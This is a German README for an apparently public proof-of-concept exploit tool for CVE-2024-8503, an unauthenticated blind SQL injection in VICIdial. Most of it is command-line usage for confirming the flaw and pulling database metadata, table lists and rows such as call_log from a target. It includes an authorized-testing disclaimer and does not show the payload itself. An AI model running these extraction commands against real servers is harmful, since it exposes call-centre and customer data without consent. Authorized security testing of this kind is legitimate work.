
Nicht authentifizierter zeitbasierter Blind-SQL-Injection-PoC für VICIdial CVE-2024-8503, mit Metadatenextraktion, fortsetzbaren Scans und strengen Sicherheitsgrenzen.
Unbestätigter zeitbasierter Blind-SQL-Injection-Proof-of-Concept für den Endpunkt VERM_AJAX_functions.php von VICIdial (CVE-2024-8503). Das Projekt ist ausschließlich für autorisierte Sicherheitstests, Validierung und Schulungszwecke bestimmt.
CVE-2024-8503 ist eine nicht authentifizierte SQL-Injection in VICIdial, bei der ein präparierter Basic-Auth-Benutzername-Wert eine angreifbare Abfragelogik in VERM_AJAX_functions.php erreichen kann. Dieser PoC verwendet zeitbasierte Inferenz, um die Ausnutzbarkeit zu bestätigen und begrenzte Metadaten sowie Tabellendaten auf kontrollierte Weise zu extrahieren.
Diese Version erzwingt strenge Proof-of-Concept-Grenzen:
requestsAbhängigkeiten installieren:
pip install requests
Führen Sie die lokale Selbstprüfung durch, um die Konfiguration zu bestätigen, ohne Netzwerkanfragen zu stellen:
python3 CVE-2024-8503-POC.py --self-check
Führen Sie einen einfachen nicht-interaktiven Scan aus:
python3 CVE-2024-8503-POC.py --url https://target.tld
Der interaktive Modus ist ein separater Workflow für operatorgesteuerte Tests. Er ist nützlich, wenn Sie Extraktionsaufgaben manuell schrittweise durchführen möchten, anstatt einen einzelnen Befehl auszuführen.
python3 CVE-2024-8503-POC.py --url https://target.tld --interactive
Das interaktive Menü unterstützt Metadaten-Extraktion, Erkennung von Tabellen und Spalten, manuelle Extraktion, Auto-Extraktion, benutzerdefinierte Abfragen und fortsetzbare vollständige Scans.
Verwenden Sie diese Befehle, wenn Sie eine bestimmte Aufgabe ausführen möchten, ohne das interaktive Menü zu betreten.
Metadaten extrahieren:
python3 CVE-2024-8503-POC.py --url https://target.tld --metadata db_version database db_user
Tabellen auflisten:
python3 CVE-2024-8503-POC.py --url https://target.tld --list-tables
Spalten für eine Tabelle abrufen:
python3 CVE-2024-8503-POC.py --url https://target.tld --get-columns call_log
Bestimmte Spalten extrahieren:
python3 CVE-2024-8503-POC.py --url https://target.tld --table call_log --columns uniqueid,channel --rows 3
Tabellendaten automatisch extrahieren:
python3 CVE-2024-8503-POC.py --url https://target.tld --auto-extract call_log
Vollständiger Scan:
python3 CVE-2024-8503-POC.py --url https://target.tld --full-scan
Benutzerdefinierte Abfrage (nur SELECT):
python3 CVE-2024-8503-POC.py --url https://target.tld --custom-query "SELECT DATABASE()"
Optionale Flags:
--path zum Ändern des Endpunkt-Pfads (Standard: /VERM/VERM_AJAX_functions.php)--skip-vuln-check zum Überspringen der anfänglichen Bestätigungsprüfung--export zum Speichern der Ergebnisse (JSON für Metadaten/vollständigen Scan, CSV für Tabellendaten)Der Fortschritt wird automatisch gespeichert unter:
.vicidial_scan_state.json
Wenn ein vorheriger Scan erkannt wird, bietet das Skript an, den Zustand fortzusetzen oder zu löschen.
LICENSE-Datei sollte im Repository-Stammverzeichnis hinzugefügt werden; diese README geht von MIT aus.Dieses Tool wird ausschließlich für autorisierte Sicherheitstests und Bildungszwecke bereitgestellt. Nicht autorisierter Zugriff auf Computersysteme ist illegal. Sie müssen eine ausdrückliche schriftliche Genehmigung einholen, bevor Sie Systeme testen, die Ihnen nicht gehören. Der Autor übernimmt keine Haftung für Missbrauch oder Schäden, die durch dieses Tool verursacht werden.
Dieses Projekt ist unter der MIT-Lizenz lizenziert. Einzelheiten finden Sie in der Datei LICENSE auf Repository-Ebene.